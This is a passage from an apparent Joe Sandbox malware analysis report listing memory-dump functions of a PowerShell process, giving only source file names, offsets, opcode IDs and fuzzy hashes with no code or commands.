                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ab6f4d90be6c4e134d6be47e0c342deb603d9a4267a6f8a58a090ab00961b9f7
                                                                                                                                        • Instruction ID: d0866f4ea46d36cb8eb1046aa85924c0137845d90423aed02c1e0438081b9d57
                                                                                                                                        • Opcode Fuzzy Hash: ab6f4d90be6c4e134d6be47e0c342deb603d9a4267a6f8a58a090ab00961b9f7
                                                                                                                                        • Instruction Fuzzy Hash: A3D18771A0864D4FEB68DF28D8657F93BE1EF56310F04427AE84DC7292CA39A545CB81
                                                                                                                                        Function 00007FFD343041C9 Relevance: .4, Instructions: 351COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b5aa08aaa3d2bd149ed837fd5e561c687bca89562dc14d31fdcdc8c64724fdf
                                                                                                                                        • Instruction ID: a6fb0e413e8010929d32de9beeb157320c008adbea1c3959b1e6e2bf27e21934
                                                                                                                                        • Opcode Fuzzy Hash: 7b5aa08aaa3d2bd149ed837fd5e561c687bca89562dc14d31fdcdc8c64724fdf
                                                                                                                                        • Instruction Fuzzy Hash: 4FA14A22B0DB860FE759A72858B627977D1EFA3210F5802BED54EC30D3ED2DAC159341
                                                                                                                                        Function 00007FFD34308B71 Relevance: .3, Instructions: 305COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dd613771c01f41723fd8b2e578c552a7b4e5802f6e2dc08d63d4b926e404ef05
                                                                                                                                        • Instruction ID: d54fc849b0eb7c52485f7a18369078d85f061737a3145f96cd9308b93c0d8379
                                                                                                                                        • Opcode Fuzzy Hash: dd613771c01f41723fd8b2e578c552a7b4e5802f6e2dc08d63d4b926e404ef05
                                                                                                                                        • Instruction Fuzzy Hash: B9911821A4EB850FE79AA72848A51757FE1EF97310B0902FFD58EC7193E929AC05C351
                                                                                                                                        Function 00007FFD34308BC6 Relevance: .3, Instructions: 261COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d3c9d5a7a73b65fd36876d674c43a04ddd68eca1d7a850c794f2ea18ff459198
                                                                                                                                        • Instruction ID: 5267a9d60a597a762e92db0d07dfffd96ebef94052f0d60ee5d8d3786cfe5443
                                                                                                                                        • Opcode Fuzzy Hash: d3c9d5a7a73b65fd36876d674c43a04ddd68eca1d7a850c794f2ea18ff459198
                                                                                                                                        • Instruction Fuzzy Hash: 9C811721B5EB864FE75AA72848A5274BBE1EF57310B0902FED18EC70D3D92DAC05C381
                                                                                                                                        Function 00007FFD34305382 Relevance: .1, Instructions: 106COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fa01b4b7d69db14c294bcbc9eafa1c43c696d549a5e5c41ec6bc8bc90647b511
                                                                                                                                        • Instruction ID: 5b966d3a96ebec00e01a85c476ca2ece9e7d0714b9b0c6bd83600759ae29bc1b
                                                                                                                                        • Opcode Fuzzy Hash: fa01b4b7d69db14c294bcbc9eafa1c43c696d549a5e5c41ec6bc8bc90647b511
                                                                                                                                        • Instruction Fuzzy Hash: F731E893F4EA970BE7E5E76828F52F8A5C1AF46311F9802B9D55ED31C2DD2C6C005242
                                                                                                                                        Function 00007FFD343089E6 Relevance: .1, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 65e7e857164a4715116165ef2204912d949f6c9b66b0d9da8db855cc015b2210
                                                                                                                                        • Instruction ID: c714d587614a914501e122fb99e0295d8229124761ba0b4520599a1aa9557572
                                                                                                                                        • Opcode Fuzzy Hash: 65e7e857164a4715116165ef2204912d949f6c9b66b0d9da8db855cc015b2210
                                                                                                                                        • Instruction Fuzzy Hash: 7F210B37B4CA0D4EF769A65C78521F977C0DFC6231F141276D54FC3982DE29E8568281
                                                                                                                                        Function 00007FFD34304354 Relevance: .1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 622b2c7aaa69809d82302b01225a9f13273c36d134b2e191cb0390b1460e709b
                                                                                                                                        • Instruction ID: dfb5a6a62ceddbf564a632a9e8ed736bbc992386f7a645cc615664ae84b3c4e5
                                                                                                                                        • Opcode Fuzzy Hash: 622b2c7aaa69809d82302b01225a9f13273c36d134b2e191cb0390b1460e709b
                                                                                                                                        • Instruction Fuzzy Hash: 09210C23B4DA460BF3A9A71C14B527862C2EFA6310B9812FED25EC31D3DD2DBD116241
                                                                                                                                        Function 00007FFD3423ABE4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 27f6f27c73c68249abf877703d8fbe27ff3da879d5721a323fc8cc6b7cee86a5
                                                                                                                                        • Instruction ID: 4c85da52aa7ce4df1610c784be43b3c7e31e43bc555831a8f6f5b11ac3fd75ba
                                                                                                                                        • Opcode Fuzzy Hash: 27f6f27c73c68249abf877703d8fbe27ff3da879d5721a323fc8cc6b7cee86a5
                                                                                                                                        • Instruction Fuzzy Hash: FB313C34A1864E8FFBB49F14CC6ABF832A1FF86718F400539D90DDA092CA3E6945DB15
                                                                                                                                        Function 00007FFD3430121F Relevance: .1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8545235a27ff9f419e10ce86cee75041a0b797684665873efbbbfa340f022b19
                                                                                                                                        • Instruction ID: 436db0638e8ab612efe147126d2f49e51f7d5f2043de28a6ff01e25bf9ada090
                                                                                                                                        • Opcode Fuzzy Hash: 8545235a27ff9f419e10ce86cee75041a0b797684665873efbbbfa340f022b19
                                                                                                                                        • Instruction Fuzzy Hash: 21212653F4EAC50FFB59A33818F51B46AC19F96600F0805BED19ED71D3DC2D58459352
                                                                                                                                        Function 00007FFD3430946E Relevance: .1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 392ddb11baec208c5fd7e65dcc698a82563d6b13ee2c64efc353f92f42c7a8a2
                                                                                                                                        • Instruction ID: 7c2525755788fc919a397484e3b488c936bdfc7123b4933785abc4fc71f75cc6
                                                                                                                                        • Opcode Fuzzy Hash: 392ddb11baec208c5fd7e65dcc698a82563d6b13ee2c64efc353f92f42c7a8a2
                                                                                                                                        • Instruction Fuzzy Hash: 3211A732B0E7850FE755EB5858A22BCB7E1FF56314F1402BAD08D97093DE282C448B45
                                                                                                                                        Function 00007FFD34233945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                                                                                                        • Instruction ID: 1d31a4645f9b11ad1dff16f63d5ad13174796b728a7875d8c628746195f64d2c
                                                                                                                                        • Opcode Fuzzy Hash: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                                                                                                        • Instruction Fuzzy Hash: A801677121CB0C8FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                                                                                                                        Function 00007FFD34309B7B Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 67df0cba3b867ae30ef927647231e652035b61a61cf1c330070ac0c1581971a3
                                                                                                                                        • Instruction ID: 933ec4ffa3f6861d1ad26defeb51d7e7781489adeb23800a6b0ee9af2334986e
                                                                                                                                        • Opcode Fuzzy Hash: 67df0cba3b867ae30ef927647231e652035b61a61cf1c330070ac0c1581971a3
                                                                                                                                        • Instruction Fuzzy Hash: 48F08231A099498FDF95EF5894555E9B7E1FF68311B0000BBE109D3162DE28A844CB80
                                                                                                                                        Function 00007FFD3430A38B Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 67df0cba3b867ae30ef927647231e652035b61a61cf1c330070ac0c1581971a3
                                                                                                                                        • Instruction ID: 5d35957079648c0634b087306d89a38b0ca012fcced42779294da951df14dc23
                                                                                                                                        • Opcode Fuzzy Hash: 67df0cba3b867ae30ef927647231e652035b61a61cf1c330070ac0c1581971a3
                                                                                                                                        • Instruction Fuzzy Hash: 39F08231A099498FDF95FF5894555ED77E0FF6831170000BBE109D3152DE28A8488780
                                                                                                                                        Function 00007FFD3430903E Relevance: .0, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3f65cde8cf43c116ebc2b85d27038f6d483a7b0fc9cb6ad46561fface1dc5af7
                                                                                                                                        • Instruction ID: 2851ba4ab0e67687dfae4df3d9bba6e646faee42eaa3e10da204900ee61e0067
                                                                                                                                        • Opcode Fuzzy Hash: 3f65cde8cf43c116ebc2b85d27038f6d483a7b0fc9cb6ad46561fface1dc5af7
                                                                                                                                        • Instruction Fuzzy Hash: 64E06D2170DE898FDB95EA5C94918A473E0EF6931030401AAE009C7197D928AC848780

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00007FFD342363F3 Relevance: 4.3, Strings: 3, Instructions: 570COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: h_H4$WH4$WH4
                                                                                                                                        • API String ID: 0-560674458
                                                                                                                                        • Opcode ID: 18dc9aa84b35449ec9ac5fdb85764dba00aa47fea37bb32473123f55caef7063
                                                                                                                                        • Instruction ID: f78605fb39696ba837311e572077ece5818b919a7d6c9c4a10845b27b7aac0d4
                                                                                                                                        • Opcode Fuzzy Hash: 18dc9aa84b35449ec9ac5fdb85764dba00aa47fea37bb32473123f55caef7063
                                                                                                                                        • Instruction Fuzzy Hash: C2022966E0DA8A4FE7A1DB1C94F55E97BF4EF53310B0401B7C648DB0A3DE2EA8069341
                                                                                                                                        Function 00007FFD342365F3 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: h_H4$WH4$WH4
                                                                                                                                        • API String ID: 0-560674458
                                                                                                                                        • Opcode ID: c0a754b48c528df7212bf9f9208c87cf2d96eadf993cd5b977be2839178e5641
                                                                                                                                        • Instruction ID: b59fa35775adc800b930385aefb5ac0e599d4df03582ac517014a4bc0af5e5e1
                                                                                                                                        • Opcode Fuzzy Hash: c0a754b48c528df7212bf9f9208c87cf2d96eadf993cd5b977be2839178e5641
                                                                                                                                        • Instruction Fuzzy Hash: 9C91F676E08A498FDBA4DF5CC4B5AE97BF1FF56310F144176D448EB1A2CA39A841CB80
                                                                                                                                        Function 00007FFD34305B7A Relevance: 3.0, Strings: 2, Instructions: 471COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: WH4$jH4
                                                                                                                                        • API String ID: 0-3603315282
                                                                                                                                        • Opcode ID: e5f96e1318a57ebb9c770e5ddf7f7594a6412eb5ab9447f844bcd70b17a203b5
                                                                                                                                        • Instruction ID: 260674752a89416a8c8e6bdd8a8a5717478753d294244e59b12668538e3edd01
                                                                                                                                        • Opcode Fuzzy Hash: e5f96e1318a57ebb9c770e5ddf7f7594a6412eb5ab9447f844bcd70b17a203b5
                                                                                                                                        • Instruction Fuzzy Hash: B8E1F461A4E7C54FD78ADB2C98A45A03FE1EF57210B1901FFC58ACB0E3D92DA846C352
                                                                                                                                        Function 00007FFD34233DF2 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: h_A4
                                                                                                                                        • API String ID: 0-1893786508
                                                                                                                                        • Opcode ID: a83479aa144982945715499cc4b2f6a38ffafed59eb52a4ba6113eaceac62634
                                                                                                                                        • Instruction ID: 9c5b7acc53377e45baf3f96744c5633b74e571d481d63907bb07c3312fed8568
                                                                                                                                        • Opcode Fuzzy Hash: a83479aa144982945715499cc4b2f6a38ffafed59eb52a4ba6113eaceac62634
                                                                                                                                        • Instruction Fuzzy Hash: 90E1D335B08A5A8FEF94DF5CC4A1AE977F1FF6A310F1401BAD549DB142CA29E842C781
                                                                                                                                        Function 00007FFD34236CFA Relevance: .5, Instructions: 519COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8de5a8d6ea386c1e220717fa0e9040b35aa04dd368648cf105f0036230345ab5
                                                                                                                                        • Instruction ID: 580219b8e2a117a2009a9c970264d5964a6f2c5abe11fcce6864052c4f97ed97
                                                                                                                                        • Opcode Fuzzy Hash: 8de5a8d6ea386c1e220717fa0e9040b35aa04dd368648cf105f0036230345ab5
                                                                                                                                        • Instruction Fuzzy Hash: FCF10432B0CA8D4FDFA5DB5CC4A1AE97BF1EF56300F0541B6D449EB192CE29A842C780
                                                                                                                                        Function 00007FFD34234231 Relevance: .5, Instructions: 518COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: efa031aea664adafa69701cb170f6bfd7def2e71219a08080b972eadd4cb7692
                                                                                                                                        • Instruction ID: 7a42bc89a703f82907717e2969ffe5499f58ce81c7f2443589dfbf5c833c1201
                                                                                                                                        • Opcode Fuzzy Hash: efa031aea664adafa69701cb170f6bfd7def2e71219a08080b972eadd4cb7692
                                                                                                                                        • Instruction Fuzzy Hash: DDF1E367A0D7C25FE712962898B61E57FF4EF5322470801FBC6C9DF093D91DA8069352
                                                                                                                                        Function 00007FFD3423B0F2 Relevance: .5, Instructions: 452COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4e6a542e136d1cbbb21c4241879b9bf63f8b436ad70586186bd8f900e9ef6b98
                                                                                                                                        • Instruction ID: 1527a1917ba8ea9228955b8fe1ade30872facf7ba26ed5b311f7ad35b06f52f6
                                                                                                                                        • Opcode Fuzzy Hash: 4e6a542e136d1cbbb21c4241879b9bf63f8b436ad70586186bd8f900e9ef6b98
                                                                                                                                        • Instruction Fuzzy Hash: C7E1B335A0CA8D4FEB64DF1898A57F93BE1EF56311F04423AE94DCB193CE39A8458781
                                                                                                                                        Function 00007FFD3423841D Relevance: .4, Instructions: 403COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d69dfeef137d8db88d6b020faf70b8487c9d4b3a65143856d8da8a962ca28334
                                                                                                                                        • Instruction ID: 03ab06de5b594cf1db82749405d89f9d65d34512e51b784ddd939a2030f819f9
                                                                                                                                        • Opcode Fuzzy Hash: d69dfeef137d8db88d6b020faf70b8487c9d4b3a65143856d8da8a962ca28334
                                                                                                                                        • Instruction Fuzzy Hash: A3D10231A0CA4C4FDB69DB9898657E9BBF1FF56310F0442AEC04DE7192CE396945CB81
                                                                                                                                        Function 00007FFD34239F25 Relevance: .3, Instructions: 318COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d1da34c2c887a31e3f795ca50d1052474f94c7aecf2ec1d1069e9bd12037ff3c
                                                                                                                                        • Instruction ID: 1be7a68ad58346a3c65d7b65abe27e2de17b99972588daddf3465064589ce0a3
                                                                                                                                        • Opcode Fuzzy Hash: d1da34c2c887a31e3f795ca50d1052474f94c7aecf2ec1d1069e9bd12037ff3c
                                                                                                                                        • Instruction Fuzzy Hash: 0591D331A0C64C8FDB19DBA898657F9BBF1EF56310F04426ED049D7292CE796845CB81
                                                                                                                                        Function 00007FFD34238C44 Relevance: .3, Instructions: 299COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: da8f56ca2c78694e4ff4bdf372d8161d17181b3659215fb1838b41029fbaa148
                                                                                                                                        • Instruction ID: 973455f4a8407a0070a2963e578000fae6abadcd0df74d5a8de5c59d05615d74
                                                                                                                                        • Opcode Fuzzy Hash: da8f56ca2c78694e4ff4bdf372d8161d17181b3659215fb1838b41029fbaa148
                                                                                                                                        • Instruction Fuzzy Hash: 4391F531E0CB4C4FDB69DBA898556EDBBF1EF96320F04826ED049D7292CE746845CB81
                                                                                                                                        Function 00007FFD342352D3 Relevance: .3, Instructions: 286COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7fe3e90c25fbc5ccb4fc2abe53f0d0d84cbfcfab12e0f1cda6df0a360891e0b1
                                                                                                                                        • Instruction ID: 92224dfab12a67a7f78ca3f23a8521b69598eb7ca9ca2fdbca619e8f56b5a8db
                                                                                                                                        • Opcode Fuzzy Hash: 7fe3e90c25fbc5ccb4fc2abe53f0d0d84cbfcfab12e0f1cda6df0a360891e0b1
                                                                                                                                        • Instruction Fuzzy Hash: 2A81B44BB0E6D61FE2A3452C28B60E9BFB0DF5312574A13F3C6C9DE4939D0E184B6652
                                                                                                                                        Function 00007FFD34233B6F Relevance: .3, Instructions: 283COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9e7018599971b8047a372b693479394fe3cf914c123756334aec486cb2588ec5
                                                                                                                                        • Instruction ID: 8fb69d035c24fef274957785a12847bc34e3a1df8cbd82e309f37cc16e954e45
                                                                                                                                        • Opcode Fuzzy Hash: 9e7018599971b8047a372b693479394fe3cf914c123756334aec486cb2588ec5
                                                                                                                                        • Instruction Fuzzy Hash: B681E06BB0D7D61FE722967D58B24E63BE0EF5326470C01B7C6C5CE093AD0E2907A252
                                                                                                                                        Function 00007FFD34236443 Relevance: .2, Instructions: 200COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 183c71cdda274724da587e15e55994bfd9e2d08f5b53c568498a60457e0d1e72
                                                                                                                                        • Instruction ID: a10e42d206383ac496e39cf442c7ba2df24ab24edd3978d8cc6e2e10aa1ffcd5
                                                                                                                                        • Opcode Fuzzy Hash: 183c71cdda274724da587e15e55994bfd9e2d08f5b53c568498a60457e0d1e72
                                                                                                                                        • Instruction Fuzzy Hash: 5051794BE0D7CA5AE7B2562C18F60E53FE8DF6326470901B7C784DE0A7ED0E58076251
                                                                                                                                        Function 00007FFD3423262D Relevance: .2, Instructions: 178COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
